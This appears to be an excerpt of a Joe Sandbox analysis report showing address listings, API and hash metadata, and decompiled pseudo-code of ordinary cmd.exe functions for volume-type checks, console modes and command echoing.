                                    0x00000000
                                    0x011ec08a
                                    0x011decb6
                                    0x011decb6
                                    0x011decb6
                                    0x011decba
                                    0x011decbd
                                    0x011decbf
                                    0x011decc2
                                    0x00000000
                                    0x00000000
                                    0x011decc8
                                    0x011decc2
                                    0x011dec93
                                    0x011dec93
                                    0x011dec95
                                    0x00000000
                                    0x011dec97
                                    0x011dec9c
                                    0x011deca2
                                    0x011deca5
                                    0x011deca7
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011deca7
                                    0x011dec95
                                    0x011dec44
                                    0x011dec4f
                                    0x011dec55
                                    0x011dec58
                                    0x011dec5a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dec5a
                                    0x00000000
                                    0x011dec42
                                    0x011dec5c
                                    0x011dec60
                                    0x011dec66
                                    0x011dec6d
                                    0x011dec6f
                                    0x011dec76
                                    0x011dec78
                                    0x011dec78
                                    0x011dec78
                                    0x011dec76
                                    0x011dec7b
                                    0x00000000
                                    0x011dec7b
                                    0x011dec60
                                    0x011dec26
                                    0x011debf4
                                    0x011debf4
                                    0x011debf6
                                    0x00000000
                                    0x011debf8
                                    0x011debfd
                                    0x011dec03
                                    0x011dec06
                                    0x011dec08
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dec08
                                    0x011debf6
                                    0x011debf2
                                    0x011deb3e
                                    0x011deb49
                                    0x011deb4f
                                    0x011deb54
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011deb54
                                    0x011deb38
                                    0x011deb2a
                                    0x011debad
                                    0x011debad
                                    0x011debb5
                                    0x011debb7
                                    0x011debc5
                                    0x011ec09a
                                    0x011ec0a6
                                    0x011ec0ac
                                    0x011ec0ad
                                    0x011ec0ad
                                    0x011ec0b0
                                    0x011ec0b0
                                    0x011ec0b3
                                    0x011ec0b6
                                    0x011ec0b6
                                    0x011ec0bf
                                    0x011dedfa
                                    0x011dedfa
                                    0x011dee02
                                    0x011dee04
                                    0x011dee07
                                    0x011dee09
                                    0x011ec0f7
                                    0x011ec103
                                    0x011ec109
                                    0x011ec10a
                                    0x011ec111
                                    0x011ec117
                                    0x011ec117
                                    0x011defe1
                                    0x011defe3
                                    0x011defea
                                    0x011defef
                                    0x011ec125
                                    0x011ec125
                                    0x00000000
                                    0x011deff5
                                    0x011dee0f
                                    0x011dee12
                                    0x011dee14
                                    0x011ec0cb
                                    0x011ec0cb
                                    0x011dee1a
                                    0x011dee1c
                                    0x011dee1e
                                    0x011ec0d5
                                    0x011ec0d5
                                    0x011dee24
                                    0x011dee24
                                    0x011dee2a
                                    0x00000000
                                    0x00000000
                                    0x011dee2a
                                    0x011dee30
                                    0x011dee32
                                    0x011ec0f0
                                    0x011ec0f0
                                    0x011dee38
                                    0x011dee38
                                    0x011dee3a
                                    0x011dee3c
                                    0x011dee3e
                                    0x011dee40
                                    0x011ec0eb
                                    0x011ec0eb
                                    0x00000000
                                    0x011dee46
                                    0x011dee46
                                    0x011dee46
                                    0x011dee49
                                    0x00000000
                                    0x00000000
                                    0x011ec0df
                                    0x011ec0e2
                                    0x011ec0e2
                                    0x011ec0e5
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ec0e5
                                    0x011dee4f
                                    0x011dee51
                                    0x00000000
                                    0x011dee57
                                    0x011dee59
                                    0x011dee59
                                    0x011dee59
                                    0x011dee51
                                    0x011dee40
                                    0x011dee5b
                                    0x011dee5d
                                    0x011dee64
                                    0x011dee67
                                    0x011dee67
                                    0x011dee69
                                    0x011dee99
                                    0x011dee99
                                    0x011dee6b
                                    0x011dee7a
                                    0x011dee7c
                                    0x011dee7c
                                    0x011dee80
                                    0x011dee80
                                    0x011dee82
                                    0x00000000
                                    0x00000000
                                    0x011dee84
                                    0x011dee88
                                    0x011dee8b
                                    0x00000000
                                    0x011dee8d
                                    0x011dee8d
                                    0x011dee90
                                    0x011dee91
                                    0x011dee94
                                    0x011dee94
                                    0x011dee97
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dee97
                                    0x00000000
                                    0x011dee8b
                                    0x011dee9e
                                    0x011deea0
                                    0x00000000
                                    0x00000000
                                    0x011deea0
                                    0x011deea2
                                    0x011deea2
                                    0x011deea5
                                    0x011deea7
                                    0x011deea7
                                    0x011deeaa
                                    0x011deda4
                                    0x011deda4
                                    0x011deda4
                                    0x011deda9
                                    0x011dedab
                                    0x00000000
                                    0x00000000
                                    0x011dedb2
                                    0x011dedb7
                                    0x011dedbc
                                    0x011dede9
                                    0x011dedec
                                    0x011dedf2
                                    0x011dedf4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dedbe
                                    0x011dedbe
                                    0x011dedc3
                                    0x011dedc8
                                    0x011dedca
                                    0x011deeb2
                                    0x011deeb4
                                    0x011deeb4
                                    0x011deeb4
                                    0x011deeb7
                                    0x011deeb9
                                    0x011deebc
                                    0x011deebc
                                    0x011deec0
                                    0x00000000
                                    0x011dedd0
                                    0x011dedd3
                                    0x011dedd5
                                    0x011dedd5
                                    0x011dedca
                                    0x00000000
                                    0x011dedbc
                                    0x011dedde
                                    0x011dede8
                                    0x011debcb
                                    0x011debcb
                                    0x011debdb
                                    0x011debdb
                                    0x011debc5
                                    0x011deaf4
                                    0x011dea8a
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: wcschr$iswspacelongjmp
                                    • String ID: =,;
                                    • API String ID: 4008636219-1539845467
                                    • Opcode ID: 090fd844132778b0661caa7d76ff908c2c05b314ef849060a375e3c381cf35fc
                                    • Instruction ID: 43664dc3122cc4c10c3e97e971d26d6a92d415cc76c40dbf87aaba725fab154d
                                    • Opcode Fuzzy Hash: 090fd844132778b0661caa7d76ff908c2c05b314ef849060a375e3c381cf35fc
                                    • Instruction Fuzzy Hash: A4D12775A01612CBDF3C9F6CD8487BE7BE5EF4020AF14446EE9469F281EB749980CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011FB9D3, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 154COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 42%
                                    			E011FB9D3(void* __ecx, char __edx, char _a4) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				char _v1085;
				long _v1092;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				void* _t63;
				WCHAR* _t64;
				int _t65;
				WCHAR* _t66;
				void* _t69;
				void* _t70;
				void* _t71;
				WCHAR* _t73;
				WCHAR* _t81;
				void* _t89;
				WCHAR* _t90;
				signed int _t91;

				_t88 = __edx;
				_t41 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t41 ^ _t91;
				_v1085 = __edx;
				_t90 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t73 = 1;
				_t89 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				_v564 = 0;
				_v560 = 1;
				_v556 = 0x104;
				memset( &_v1084, 0, 0x104);
				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L27:
					_t90 = _t73;
					goto L28;
				} else {
					_t63 = _v564;
					if(_t63 == 0) {
						_t63 =  &_v1084;
					}
					__imp__GetVolumePathNameW(_t89, _t63, _v556);
					if(_t63 == 0) {
						goto L27;
					} else {
						_t64 = _v564;
						if(_t64 == 0) {
							_t64 =  &_v1084;
						}
						_t65 = GetDriveTypeW(_t64);
						if(_t65 == 0 || _t65 == 4) {
							_t73 = _t90;
							goto L27;
						} else {
							_t66 = _v28;
							if(_t66 == 0) {
								_t66 =  &_v548;
							}
							_t81 = _v564;
							if(_t81 == 0) {
								_t81 =  &_v1084;
							}
							if(GetVolumeInformationW(_t81, _t90, _t90, _t90,  &_v1092,  &_v1092, _t66, _v20) == 0) {
								goto L27;
							} else {
								_t69 = _v28;
								if(_t69 == 0) {
									_t69 =  &_v548;
								}
								__imp___wcsicmp(_t69, L"NTFS");
								if(_t69 != 0) {
									if(_a4 == 0) {
										L21:
										if(_v1085 == 0) {
											L28:
											_t73 = _t90;
										} else {
											_t70 = _v28;
											if(_t70 == 0) {
												_t70 =  &_v548;
											}
											__imp___wcsicmp(_t70, L"CSVFS");
											if(_t70 != 0) {
												goto L28;
											} else {
											}
										}
									} else {
										_t71 = _v28;
										if(_t71 == 0) {
											_t71 =  &_v548;
										}
										__imp___wcsicmp(_t71, L"REFS");
										if(_t71 != 0) {
											goto L21;
										}
									}
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z(_v564);
				__imp__??_V@YAXPAX@Z();
				return E011E6FD0(_t73, _t73, _v8 ^ _t91, _t88, _t89, _t90, _v28);
			}






























                                    0x011fb9d3
                                    0x011fb9de
                                    0x011fb9e5
                                    0x011fb9f0
                                    0x011fb9f7
                                    0x011fb9f9
                                    0x011fb9fe
                                    0x011fba07
                                    0x011fba0a
                                    0x011fba0c
                                    0x011fba0f
                                    0x011fba17
                                    0x011fba22
                                    0x011fba28
                                    0x011fba37
                                    0x011fba60
                                    0x011fbb85
                                    0x011fbb85
                                    0x00000000
                                    0x011fba90
                                    0x011fba90
                                    0x011fba98
                                    0x011fba9a
                                    0x011fba9a
                                    0x011fbaa8
                                    0x011fbab0
                                    0x00000000
                                    0x011fbab6
                                    0x011fbab6
                                    0x011fbabe
                                    0x011fbac0
                                    0x011fbac0
                                    0x011fbac7
                                    0x011fbacf
                                    0x011fbb83
                                    0x00000000
                                    0x011fbade
                                    0x011fbade
                                    0x011fbae3
                                    0x011fbae5
                                    0x011fbae5
                                    0x011fbaeb
                                    0x011fbaf3
                                    0x011fbaf5
                                    0x011fbaf5
                                    0x011fbb13
                                    0x00000000
                                    0x011fbb15
                                    0x011fbb15
                                    0x011fbb1a
                                    0x011fbb1c
                                    0x011fbb1c
                                    0x011fbb28
                                    0x011fbb32
                                    0x011fbb38
                                    0x011fbb59
                                    0x011fbb60
                                    0x011fbb87
                                    0x011fbb87
                                    0x011fbb62
                                    0x011fbb62
                                    0x011fbb67
                                    0x011fbb69
                                    0x011fbb69
                                    0x011fbb75
                                    0x011fbb7f
                                    0x00000000
                                    0x00000000
                                    0x011fbb81
                                    0x011fbb7f
                                    0x011fbb3a
                                    0x011fbb3a
                                    0x011fbb3f
                                    0x011fbb41
                                    0x011fbb41
                                    0x011fbb4d
                                    0x011fbb57
                                    0x00000000
                                    0x00000000
                                    0x011fbb57
                                    0x011fbb38
                                    0x011fbb32
                                    0x011fbb13
                                    0x011fbacf
                                    0x011fbab0
                                    0x011fbb8f
                                    0x011fbb99
                                    0x011fbbb2

                                    APIs
                                    • memset.MSVCRT ref: 011FBA0F
                                    • memset.MSVCRT ref: 011FBA37
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 011FBAA8
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 011FBAC7
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 011FBB0B
                                    • _wcsicmp.MSVCRT ref: 011FBB28
                                    • _wcsicmp.MSVCRT ref: 011FBB4D
                                    • _wcsicmp.MSVCRT ref: 011FBB75
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FBB8F
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FBB99
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                    • String ID: CSVFS$NTFS$REFS
                                    • API String ID: 3510147486-2605508654
                                    • Opcode ID: f5cb1b98b98330f5ca5b9354e9a59bc48fd6f4c930044e61112adaf2d658705a
                                    • Instruction ID: 3db9261824c524a6b4d51de2342579f8ebcffa884e9a100c7a087b82e7a779f9
                                    • Opcode Fuzzy Hash: f5cb1b98b98330f5ca5b9354e9a59bc48fd6f4c930044e61112adaf2d658705a
                                    • Instruction Fuzzy Hash: A1515971A0421D9FEF39CAA5DC88BEBBBB8EF14254F4400ADE605D3145DB74DA84CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D9520, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 128COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                    • API String ID: 2081463915-3124875276
                                    • Opcode ID: 8e707505f1527dff521f1d85b8678826c74bf4a0f7a09bff22bbc1ba2f659c02
                                    • Instruction ID: 1c8a1eec7a84777907af1baae7f2797f17b6388be35321655d3d405e1e917a4b
                                    • Opcode Fuzzy Hash: 8e707505f1527dff521f1d85b8678826c74bf4a0f7a09bff22bbc1ba2f659c02
                                    • Instruction Fuzzy Hash: 3A4128313007069AEB3DAF39F869B6A7BA5EB5462CF54012FE213865C1EF72D181C711
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E06C0, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 90COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 21%
                                    			E011E06C0(void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t15;
				void* _t16;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				void* _t26;
				void* _t27;
				intOrPtr* _t28;
				signed int _t29;
				void* _t30;
				void* _t32;

				_t4 =  *0x11fd0b4; // 0x2833377e
				_t5 = _t4 ^ _t29;
				_v8 = _t5;
				__imp___get_osfhandle( *0x1203880, __ecx);
				_t6 = SetConsoleMode(_t5, 1);
				__imp___get_osfhandle(0x1203880);
				_t32 = _t30 + 8;
				_t7 = GetConsoleMode(_t6, 1);
				if(_t7 == 0) {
					L2:
					__imp___get_osfhandle(0x1203884);
					if(GetConsoleMode(_t7, 0) != 0) {
						_t20 =  *0x1203884;
						_t8 = _t20 & 0x00000017;
						if(_t8 != 7) {
							_t23 = _t20 & 0xffffffef | 0x00000007;
							 *0x1203884 = _t23;
							__imp___get_osfhandle(_t23);
							_t8 = SetConsoleMode(_t8, 0);
						}
						_push(_t27);
						_t28 =  *0x1203888;
						if(_t28 != 0) {
							 *0x12194b4(L"CMD.EXE");
							_t8 =  *_t28();
						}
						_pop(_t27);
					}
					return E011E6FD0(_t8, _t16, _v8 ^ _t29, _t25, _t26, _t27);
				}
				_t24 =  *0x11fd0e0; // 0x7
				_t25 =  *0x1203880;
				_t7 = _t24 & _t25;
				if(_t7 != _t24) {
					_t25 = _t25 | _t24;
					 *0x1203880 = _t25;
					__imp___get_osfhandle(_t25);
					_t32 = _t32 + 4;
					_t7 = SetConsoleMode(_t7, 1);
					if(_t7 != 0) {
						goto L2;
					}
					_t7 =  *0x11fd0e0; // 0x7
					if((_t7 & 0x00000004) != 0) {
						 *0x11fd0e0 = _t7 & 0xfffffffb;
						_t15 =  *0x1203880 & 0xfffffffb;
						 *0x1203880 = _t15;
						__imp___get_osfhandle(_t15);
						_t32 = _t32 + 4;
						_t7 = SetConsoleMode(_t15, 1);
					}
				}
				goto L2;
			}





















                                    0x011e06c6
                                    0x011e06cb
                                    0x011e06cd
                                    0x011e06d8
                                    0x011e06e2
                                    0x011e06ef
                                    0x011e06f5
                                    0x011e06f9
                                    0x011e0701
                                    0x011e0717
                                    0x011e071e
                                    0x011e0730
                                    0x011e0732
                                    0x011e073a
                                    0x011e073f
                                    0x011e0744
                                    0x011e074a
                                    0x011e0750
                                    0x011e075a
                                    0x011e075a
                                    0x011e0760
                                    0x011e0761
                                    0x011e0769
                                    0x011e0772
                                    0x011e0778
                                    0x011e0778
                                    0x011e077a
                                    0x011e077a
                                    0x011e0788
                                    0x011e0788
                                    0x011e0703
                                    0x011e070b
                                    0x011e0711
                                    0x011e0715
                                    0x011e0789
                                    0x011e078e
                                    0x011e0794
                                    0x011e079a
                                    0x011e079e
                                    0x011e07a6
                                    0x00000000
                                    0x00000000
                                    0x011ecc03
                                    0x011ecc0a
                                    0x011ecc13
                                    0x011ecc1d
                                    0x011ecc23
                                    0x011ecc28
                                    0x011ecc2e
                                    0x011ecc32
                                    0x011ecc32
                                    0x011ecc0a
                                    0x00000000

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E06D8
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011F38A5), ref: 011E06E2
                                    • _get_osfhandle.MSVCRT ref: 011E06EF
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E06F9
                                    • _get_osfhandle.MSVCRT ref: 011E071E
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E0728
                                    • _get_osfhandle.MSVCRT ref: 011E0750
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E075A
                                    • _get_osfhandle.MSVCRT ref: 011E0794
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E079E
                                    • _get_osfhandle.MSVCRT ref: 011ECC28
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011ECC32
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ConsoleMode_get_osfhandle
                                    • String ID: CMD.EXE
                                    • API String ID: 1606018815-3025314500
                                    • Opcode ID: 01a5888d23800d0a3d92f9b70e6f19f1b6809fadd3c3eda2c25a491e1cdc745d
                                    • Instruction ID: b2df2b0f06f3245a785a2f867bdb3917657bd21561ff69f95b3df2b282e24d7a
                                    • Opcode Fuzzy Hash: 01a5888d23800d0a3d92f9b70e6f19f1b6809fadd3c3eda2c25a491e1cdc745d
                                    • Instruction Fuzzy Hash: 8031B1B0B40A04AFDF38DBA8FC1EB253AE4BB14719B08062DF512C2185DBB0D984CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D9835, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 300COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E011D9835(intOrPtr* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* __ebx;
				void* __ebp;
				intOrPtr _t76;
				intOrPtr _t87;
				intOrPtr _t90;
				signed int _t91;
				signed char _t103;
				signed int _t107;
				intOrPtr _t108;
				signed int _t125;
				signed int _t144;
				intOrPtr* _t179;
				void* _t182;

				_t153 = __edx;
				_t123 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t179 = __ecx;
				_t114 = 0;
				_t182 = __edx;
				_v8 = 0;
				_t76 =  *__ecx;
				if(_t76 > 0x37) {
					__eflags = _t76 - 0x38;
					if(__eflags == 0) {
						E011D9899(0, _a4,  *((intOrPtr*)(__ecx + 0x38)), 1);
						L78:
						_t125 =  *(_t179 + 0x3c);
						L79:
						E011D9835(_t125, _t182, _a4);
						L7:
						return 0;
					}
					if(__eflags <= 0) {
						L54:
						__imp__longjmp(0x120b8f8, 0xffffffff);
						L55:
						E011D9899(_t114, _a4, "(", _t114);
						_v8 = ")";
						L60:
						E011D9835( *((intOrPtr*)(_t179 + 0x38)), _t182, _a4);
						E011D9899(_t114, _a4, _v8, _t114);
						__eflags =  *_t179 - 0x33;
						if( *_t179 == 0x33) {
							goto L7;
						}
						__eflags =  *_t179 - 0x3b;
						if( *_t179 == 0x3b) {
							goto L7;
						}
						goto L78;
					}
					__eflags = _t76 - 0x3a;
					if(_t76 <= 0x3a) {
						_v8 = L"== ";
						__eflags =  *0x1213cc9;
						if( *0x1213cc9 != 0) {
							_t87 =  *((intOrPtr*)(__ecx + 0x44));
							__eflags = _t87 - 1;
							if(_t87 != 1) {
								__eflags = _t87 - 2;
								if(_t87 != 2) {
									__eflags = _t87 - 3;
									if(_t87 != 3) {
										__eflags = _t87 - 4;
										if(_t87 != 4) {
											__eflags = _t87 - 5;
											if(_t87 != 5) {
												__eflags = _t87 - 6;
												if(_t87 == 6) {
													_v8 = L"GEQ ";
												}
											} else {
												_v8 = L"GTR ";
											}
										} else {
											_v8 = L"LEQ ";
										}
									} else {
										_v8 = L"LSS ";
									}
								} else {
									_v8 = L"NEQ ";
								}
							} else {
								_v8 = L"EQU ";
							}
						}
						E011D9899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)), 1);
						_t114 = 0;
						_push(0);
						_push(_v8);
						L4:
						E011D9899(_t114, _a4);
						if( *(_t179 + 0x3c) != _t114) {
							E011D9899(_t114, _a4,  *(_t179 + 0x3c), _t114);
						}
						E011D9CA6(_t179, _t182, _a4);
						goto L7;
					}
					__eflags = _t76 - 0x3b;
					if(_t76 == 0x3b) {
						L13:
						E011D9CA6(_t123, _t153, _a4);
						_t114 = 1;
						__eflags =  *_t179 - 0x2e;
						if( *_t179 < 0x2e) {
							goto L60;
						}
						__eflags =  *_t179 - 0x2f;
						if( *_t179 <= 0x2f) {
							_v8 = "&";
							goto L60;
						}
						__eflags =  *_t179 - 0x30;
						if( *_t179 == 0x30) {
							_v8 = L"||";
							goto L60;
						}
						__eflags =  *_t179 - 0x31;
						if( *_t179 == 0x31) {
							_v8 = L"&&";
							goto L60;
						}
						__eflags =  *_t179 - 0x32;
						if( *_t179 == 0x32) {
							_v8 = "|";
							goto L60;
						}
						__eflags =  *_t179 - 0x33;
						if( *_t179 == 0x33) {
							goto L55;
						} else {
							__eflags =  *_t179 - 0x3b;
							if( *_t179 == 0x3b) {
								E011D9899(1, _a4, "@", 1);
								_v8 = " ";
							}
							goto L60;
						}
					}
					__eflags = _t76 - 0x3c;
					if(_t76 != 0x3c) {
						goto L54;
					}
					_t90 =  *0x1218510;
					__eflags = _t90 - 0x2396;
					if(_t90 != 0x2396) {
						__eflags = _t90 - 0x2395;
						if(_t90 != 0x2395) {
							__eflags = _t90 - 0x2390;
							if(_t90 != 0x2390) {
								goto L54;
							}
							_t91 = L"REM /?";
							L53:
							E011D9899(_t114, _a4, _t91, 1);
							goto L7;
						}
						_t91 = L"IF /?";
						goto L53;
					}
					_t91 = L"FOR /?";
					goto L53;
				}
				if(_t76 >= 0x34 || _t76 == 0) {
					L3:
					_push(1);
					_push( *((intOrPtr*)(_t179 + 0x38)));
					goto L4;
				} else {
					__eflags = _t76 - 0x2b;
					if(_t76 == 0x2b) {
						E011D9899(1, _a4, L"FOR", 1);
						__eflags =  *0x1213cc9;
						if( *0x1213cc9 == 0) {
							L41:
							E011D9899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)) + 6, 1);
							E011D9899(1, _a4, "(", 1);
							E011D9899(1, _a4,  *(_t179 + 0x3c), 0);
							E011D9899(1, _a4, ")", 0);
							E011D9899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)) + 0x2c, 1);
							_t125 =  *(_t179 + 0x40);
							goto L79;
						}
						_t103 =  *(__ecx + 0x48);
						__eflags = 1 & _t103;
						if((1 & _t103) == 0) {
							__eflags = _t103 & 0x00000002;
							if((_t103 & 0x00000002) == 0) {
								__eflags = _t103 & 0x00000008;
								if((_t103 & 0x00000008) == 0) {
									__eflags = _t103 & 0x00000004;
									if((_t103 & 0x00000004) == 0) {
										goto L41;
									}
									_push(1);
									_push(L"/R");
									L38:
									E011D9899(1, _a4);
									__eflags =  *(_t179 + 0x4c);
									if( *(_t179 + 0x4c) == 0) {
										goto L41;
									}
									_push(1);
									_push( *(_t179 + 0x4c));
									goto L40;
								}
								_push(1);
								_push(L"/F");
								goto L38;
							}
							_push(1);
							_push(L"/D");
							goto L40;
						} else {
							_push(1);
							_push(L"/L");
							L40:
							E011D9899(1, _a4);
							goto L41;
						}
					}
					__eflags = _t76 - 0x2c;
					if(_t76 == 0x2c) {
						E011D9899(1, _a4,  *((intOrPtr*)(__ecx + 0x38)), 1);
						_t107 =  *(__ecx + 0x3c);
						_t144 = 0;
						__eflags =  *_t107 - 0x38;
						if( *_t107 == 0x38) {
							_t108 =  *((intOrPtr*)(_t107 + 0x3c));
							__eflags =  *((intOrPtr*)(_t108 + 0x40)) - 2;
							_t107 =  *(__ecx + 0x3c);
							if( *((intOrPtr*)(_t108 + 0x40)) == 2) {
								_t144 = L"/I";
							}
						} else {
							asm("sbb ecx, ecx");
							_t144 =  !( ~( *((intOrPtr*)(_t107 + 0x40)) - 2)) & L"/I";
						}
						__eflags = _t144;
						if(_t144 != 0) {
							E011D9899(1, _a4, _t144, 1);
							_t107 =  *(_t179 + 0x3c);
						}
						E011D9835(_t107, _t182, _a4);
						E011D9835( *(_t179 + 0x40), _t182, _a4);
						__eflags =  *(_t179 + 0x48);
						if( *(_t179 + 0x48) == 0) {
							goto L7;
						} else {
							E011D9899(1, _a4,  *((intOrPtr*)(_t179 + 0x44)), 1);
							_t125 =  *(_t179 + 0x48);
							goto L79;
						}
					}
					__eflags = _t76 - 0x2d;
					if(__eflags == 0) {
						goto L3;
					}
					if(__eflags <= 0) {
						goto L54;
					}
					__eflags = _t76 - 0x33;
					if(_t76 > 0x33) {
						goto L54;
					}
					goto L13;
				}
			}

















                                    0x011d9835
                                    0x011d9835
                                    0x011d983a
                                    0x011d983b
                                    0x011d983f
                                    0x011d9841
                                    0x011d9843
                                    0x011d9845
                                    0x011d9848
                                    0x011d984d
                                    0x011f0ed1
                                    0x011f0ed4
                                    0x011f1036
                                    0x011f103b
                                    0x011f103b
                                    0x011f103e
                                    0x011f1043
                                    0x011d988e
                                    0x011d9896
                                    0x011d9896
                                    0x011f0eda
                                    0x011f0f32
                                    0x011f0f39
                                    0x011f0f3f
                                    0x011f0f4a
                                    0x011f0f4f
                                    0x011f0f7a
                                    0x011f0f82
                                    0x011f0f90
                                    0x011f0f95
                                    0x011f0f98
                                    0x00000000
                                    0x00000000
                                    0x011f0f9e
                                    0x011f0fa1
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f0fa7
                                    0x011f0edc
                                    0x011f0edf
                                    0x011f0fae
                                    0x011f0fb6
                                    0x011f0fbd
                                    0x011f0fbf
                                    0x011f0fc2
                                    0x011f0fc4
                                    0x011f0fcf
                                    0x011f0fd2
                                    0x011f0fdd
                                    0x011f0fe0
                                    0x011f0feb
                                    0x011f0fee
                                    0x011f0ff9
                                    0x011f0ffc
                                    0x011f1007
                                    0x011f100a
                                    0x011f100c
                                    0x011f100c
                                    0x011f0ffe
                                    0x011f0ffe
                                    0x011f0ffe
                                    0x011f0ff0
                                    0x011f0ff0
                                    0x011f0ff0
                                    0x011f0fe2
                                    0x011f0fe2
                                    0x011f0fe2
                                    0x011f0fd4
                                    0x011f0fd4
                                    0x011f0fd4
                                    0x011f0fc6
                                    0x011f0fc6
                                    0x011f0fc6
                                    0x011f0fc4
                                    0x011f101c
                                    0x011f1021
                                    0x011f1023
                                    0x011f1024
                                    0x011d9865
                                    0x011d986a
                                    0x011d9872
                                    0x011d987d
                                    0x011d987d
                                    0x011d9889
                                    0x00000000
                                    0x011d9889
                                    0x011f0ee5
                                    0x011f0ee8
                                    0x011f0d18
                                    0x011f0d1b
                                    0x011f0d22
                                    0x011f0d23
                                    0x011f0d26
                                    0x00000000
                                    0x00000000
                                    0x011f0d2c
                                    0x011f0d2f
                                    0x011f0f73
                                    0x00000000
                                    0x011f0f73
                                    0x011f0d35
                                    0x011f0d38
                                    0x011f0f6a
                                    0x00000000
                                    0x011f0f6a
                                    0x011f0d3e
                                    0x011f0d41
                                    0x011f0f61
                                    0x00000000
                                    0x011f0f61
                                    0x011f0d47
